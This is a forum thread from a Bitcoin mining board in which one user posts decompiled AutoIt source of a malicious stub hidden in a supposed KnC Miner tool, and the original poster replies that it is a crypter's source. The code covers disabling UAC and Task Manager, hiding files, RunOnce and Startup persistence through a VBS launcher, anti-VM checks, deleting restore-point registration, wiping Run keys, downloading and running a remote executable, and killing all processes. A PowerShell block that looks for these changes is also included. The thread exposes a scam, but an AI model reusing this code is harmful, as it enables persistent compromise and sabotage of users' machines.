Board: Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by steve15 on 28/01/2014, 15:22:21 UTC
That was smart to let us look the other way...
I'm disappointed by myself, I should have seen that earlier...
Code:
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf

Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "\mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc

Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc

Func fakemessage()
$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc

Func mutex()
$scriptname = "lmsqQw.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc

Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc

Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc

Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
$autoit3 = "lmsqQw.exe"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc

Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc

Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc

Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc

Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc

Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc

Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc

Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc

Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc

Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]

[SNIP]
-----------------
[SNIP]

Func loop()
While 1
If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc

Yeah, why should I bother running this in a VM, huh?

Nice game OP... but you lose!
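A defender-side check for the host changes this stub makes (an added example, not code from the thread or from either poster): read-only PowerShell that looks for the registry values, RunOnce entry and hidden Startup shortcut written by the decompiled functions above. It assumes the dropped names are as shown in the posted source and is run elevated so HKLM is readable.

```powershell
# Added example: looks for the indicators the decompiled AutoIt stub leaves behind.
# Read-only; it reports, it does not remediate. Run from an elevated shell.
function Test-RegValue {
    param([string]$Path, [string]$Name, $Bad, [string]$Why)
    $v = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $v -and $v.$Name -eq $Bad) { "$Why ($Path\$Name = $Bad)" }
}

function Find-StubIndicators {
    # disable_uac(): EnableLUA = 0 switches UAC off system-wide
    Test-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' 'EnableLUA' 0 'UAC disabled'
    # antitask(): DisableTaskMgr = 1 blocks Task Manager for the current user
    Test-RegValue 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System' 'DisableTaskMgr' 1 'Task Manager disabled'
    # systemhide(): hide Folder Options and protected OS files so the +SHR drops stay invisible
    Test-RegValue 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' 'NoFolderOptions' 1 'Folder Options hidden'
    Test-RegValue 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced' 'ShowSuperHidden' 0 'Protected OS files hidden'

    # startup(): a RunOnce value whose data points at a .vbs launcher
    $runOnce = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce' -ErrorAction SilentlyContinue
    if ($runOnce) {
        $runOnce.PSObject.Properties |
            Where-Object { $_.Value -is [string] -and $_.Value -match '\.vbs$' } |
            ForEach-Object { "RunOnce '$($_.Name)' launches a VBS: $($_.Value)" }
    }

    # startup(): hidden start.lnk shortcut in the user's Startup folder
    $lnk = Join-Path ([Environment]::GetFolderPath('Startup')) 'start.lnk'
    if (Test-Path -LiteralPath $lnk) {
        $attr = (Get-Item -LiteralPath $lnk -Force).Attributes
        "Startup shortcut present: $lnk (attributes: $attr)"
    }

    # disable_syste_restore(): the SPP\Clients key is deleted outright. Weak signal on its
    # own, since the key can legitimately be absent on some builds; correlate with the rest.
    if (-not (Test-Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP\Clients')) {
        'SPP\Clients key missing (restore-point client registration removed)'
    }
}

$findings = @(Find-StubIndicators | Where-Object { $_ })
if ($findings.Count -eq 0) { 'No indicators from the posted stub found.' } else { $findings }
```

The botkiller() function wipes the Run keys and the Startup folder entirely, so an unexpectedly empty HKCU/HKLM Run key on a machine that previously had entries is a further sign worth checking by hand.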

Are you kidding me or what? Did you really just post the crypter's source?!
What the hell has this to do with my source, huh?
The source you just posted proves that none of the functions included, except the anti-virtuals, are being used.

Quote
That was smart to let us look the other way...
I'm disappointed by myself, I should have seen that earlier...

If you didn't even see that one, even after decompiling the executable, well, I'm sorry, but you're unskilled then.
Plus, if you followed the topic, I explicitly posted about crypting the source.

Now for the last time, stop spamming my topic. I've had enough of your makes-no-sense posts here.
If you really think you are all that mighty, then PM me as I asked you, and we'll compare our sources.

Then once again, you will be disappointed by yourself. For the third time in a row.